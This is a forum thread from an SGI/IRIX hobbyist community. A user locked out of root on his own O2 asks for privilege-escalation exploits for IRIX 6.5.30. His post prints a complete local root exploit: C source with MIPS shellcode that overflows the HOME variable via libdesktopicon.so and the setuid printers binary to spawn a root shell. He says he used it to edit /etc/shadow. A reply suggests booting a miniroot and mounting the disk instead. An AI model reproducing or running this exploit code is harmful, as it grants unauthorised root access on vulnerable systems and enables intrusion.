Anyone have any go-to hacks/exploits to get IRIX root access?

gijoe77

Member
Feb 18, 2019
So I was playing with an older O2 (6.5.22m) - I booted it and the DALLAS battery went dead, and I guess it must have reset the date to some very early date - enough that when I tried to log in as root it asked me to change the password (I actually don't even use a root password - I know - security lulz!). I thought no problem, so I changed the password, but it still won't let me log in - it asks me to change the password again - it's an endless loop of aged-out passwords or something.

When I put the drive back into a regularly functioning O2, I still can't log in as root, and the password I changed it to is not working. Both of the O2s I'm working on are the R10k models, so it would be a hassle currently to install the impacted root drive as an option drive to edit the /etc/shadow file. I thought an easier approach would be to just log into one of the guest accounts I have, run a local privilege escalation exploit and edit the /etc/shadow file in that manner.

So I went through the various exploits I was able to find via Google, and basically all of the ones I was able to find were for older versions of IRIX, and I wasn't able to find any for 6.5.30 (any that explicitly said they work for 6.5.30).

I have a go-to exploit that works for 6.5.22 (file is called irx_libdesktopicon.c):
Code:
/*## copyright LAST STAGE OF DELIRIUM jun 2003 poland        *://lsd-pl.net/ #*/
/*## libdesktopicon.so $HOME                                                 #*/

/* standard headers for printf/exit/strlen/execle (implicit in the original) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOPNUM 1300
#define ADRNUM 900
#define PCHNUM 400
char setreuidcode[]=
    "\x30\x0b\xff\xff"    /* andi    $t3,$zero,0xffff     */
    "\x24\x02\x04\x01"    /* li      $v0,1024+1           */
    "\x20\x42\xff\xff"    /* addi    $v0,$v0,-1           */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "\x30\x44\xff\xff"    /* andi    $a0,$v0,0xffff       */
    "\x31\x65\xff\xff"    /* andi    $a1,$t3,0xffff       */
    "\x24\x02\x04\x64"    /* li      $v0,1124             */
    "\x03\xff\xff\xcc"    /* syscall                      */
;

char shellcode[]=
    "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
    "\x24\x02\x03\xf3"    /* li      $v0,1011             */
    "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
    "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
    "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
    "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
    "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
    "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
    "\x03\xe0\x00\x08"    /* jr      $ra                  */
;

char nop[]="\x24\x0f\x12\x34";

int main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b,*envp[2];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM jun 2003 poland  //lsd-pl.net/\n");
    printf("libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 ");
    printf("IP:ALL\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8580+3056+600;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8580+400+31552;

    envp[0]=buffer;
    envp[1]=0;

    b=buffer;
    sprintf(b,"HOME=");
    b+=5;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    execle("/usr/sbin/printers","lsd","-display",argv[1],0,envp);
    return 0;
}

Once I ran this on a regular user account, I was able to modify /etc/shadow.

I've been thinking of upgrading to 6.5.30 from 6.5.22, but this exploit (I tend to think of it more as a time saver for me) won't work in 6.5.30. Other than playing around with setting up an external SCSI case and mounting my problem drive that way, I'm wondering if anyone has a slick exploit handy that works with 6.5.30 as well.
 
Edit: With apologies, I no longer wish to have involvement with SGUG or SGI communities in general,
and have also chosen to remove all of my content. Many things have changed since I co-founded, named, and ultimately
then left SGUG. There are many good people around, to whom I apologize for frustrating by removing these things, and
also many petty people that over the years whittled down both the enjoyment as well as sense of obligation I used to
feel to anyone else regarding what was ultimately just a hobby. Unfortunately one of the latter now writes the rules
and so it is time for me to take my things and go.

This message will replace all of my previous forum posts because deleting threads that I started would have removed
other peoples' posts.
 
Shouldn't it be possible to boot sash and stuff from an install CD, or over the net for miniroot, and then mount the disk?
Something like this..?
 
Shouldn't it be possible to boot sash and stuff from an install CD, or over the net for miniroot, and then mount the disk?
Something like this..?

Yeah, that's another way of doing it - it's still a hassle though (need a working CD-ROM, gotta have the install media handy).
 